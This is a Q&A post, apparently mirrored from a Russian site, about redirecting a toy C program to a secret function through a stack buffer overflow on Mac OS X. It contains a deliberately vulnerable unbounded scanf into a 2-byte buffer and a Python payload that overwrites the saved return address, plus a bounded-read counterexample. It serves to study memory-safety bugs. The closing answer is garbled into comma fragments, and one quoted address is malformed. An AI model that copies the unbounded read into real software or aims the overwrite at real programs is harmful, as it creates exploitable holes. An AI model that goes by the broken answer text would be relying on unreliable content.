Simple buffer overflow using scanf (Mac OS X 10.6.5 64-bit)

For educational purposes, I'm trying to perform a buffer overflow that redirects the program to a different address.

This is a C program:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void secret1(void) {
    puts("You found the secret function No. 1!\n");
}

int main(void) {
    char string[2];                  /* 2-byte buffer on the stack */
    puts("Input: ");
    scanf("%s", string);             /* unbounded read: the overflow under study */
    printf("You entered %s.\n", string);
    return 0;
}

I used gdb to find the address of secret1, as well as the offset of my string variable relative to RIP. Using this information, I created the following Python exploit:

import struct
import sys

rip = 0x0000000100000e40          # address of secret1, taken from gdb
# 24 bytes of padding up to the saved return address, then the fake RIP as a
# little-endian 64-bit value; written as raw bytes so Python 3 does not print a repr
sys.stdout.buffer.write(b"A" * 24 + struct.pack("<q", rip) + b"\n")

Up to this point everything works: the program jumps to secret1 and then crashes with "Segmentation Error".

HOWEVER, if I extend my program as follows:

...
void secret1(void) {
    puts("You found the secret function No. 1!\n");
}

void secret2(void) {
    puts("You found the secret function No. 2!\n");
}

void secret3(void) {
    puts("You found the secret function No. 3!\n");
}
...

... it just segfaults WITHOUT switching to any of the functions, even though the new fake RIPs are correct (i.e. 0x0000000100000d6c for secret1, 0x0000000101000000d7e for secret2). The offset remains the same as gdb told me (or does it?).


-fno-stack-protector // doesn't make any difference.

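The unbounded scanf("%s", string) in the question is what lets the 24 'A's run past the 2-byte buffer into the saved return address. As an added example that is not from the question or its answers, the function below (assumed names read_token and check_token) is the width-limited counterpart: it stores at most sizeof buffer - 1 characters and reports, rather than silently truncates, a token that does not fit.

```c
#include <stdio.h>
#include <string.h>

/* read_token() is the bounded counterpart of the question's scanf("%s", string):
 * it builds a width-limited conversion ("%1s" for a 2-byte buffer) so at most
 * dstsz - 1 characters plus the NUL are ever stored. Returns the number of
 * characters stored, 0 if there was no token, or -1 if the token did not fit
 * (the excess is left unread so the caller can reject it instead of silently
 * truncating). Assumed helper names; not code from the question. */
int read_token(const char *input, char *dst, size_t dstsz) {
    char fmt[32];
    int consumed = 0;
    if (dstsz < 2) return -1;                 /* need room for one char + NUL */
    /* e.g. dstsz == 2 -> "%1s%n"; %n records how far sscanf read */
    snprintf(fmt, sizeof fmt, "%%%zus%%n", dstsz - 1);
    dst[0] = '\0';
    if (sscanf(input, fmt, dst, &consumed) != 1) return 0;
    /* If the character right after the consumed span is neither whitespace
     * nor end of input, the token was longer than the buffer allows. */
    switch (input[consumed]) {
    case '\0': case ' ': case '\t': case '\n': case '\r':
        return (int)strlen(dst);
    default:
        return -1;
    }
}

/* Convenience wrapper: read into a local buffer of the requested size. */
int check_token(const char *input, size_t dstsz) {
    char buf[64];
    if (dstsz > sizeof buf) return -2;
    return read_token(input, buf, dstsz);
}

int main(void) {
    char string[2];                           /* same 2-byte buffer as the question */
    const char *payload = "AAAAAAAAAAAAAAAAAAAAAAAA";  /* constructed: the 24 'A's */
    if (read_token(payload, string, sizeof string) < 0)
        puts("input too long, rejected");
    else
        printf("You entered %s.\n", string);
    return 0;
}
```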

... RWX mprotect. , , , .

-fno-stack-protector gcc, , gcc 4.2.1. , , , , sizeof (buffer) >= 8 . , char, -fstack-protector-all -fnostack-protector-all, , char. OS X 10.6.5 64- gcc , , -fstack-protector-all - (, , char). , , , .


Source: https://habr.com/ru/post/1783208/
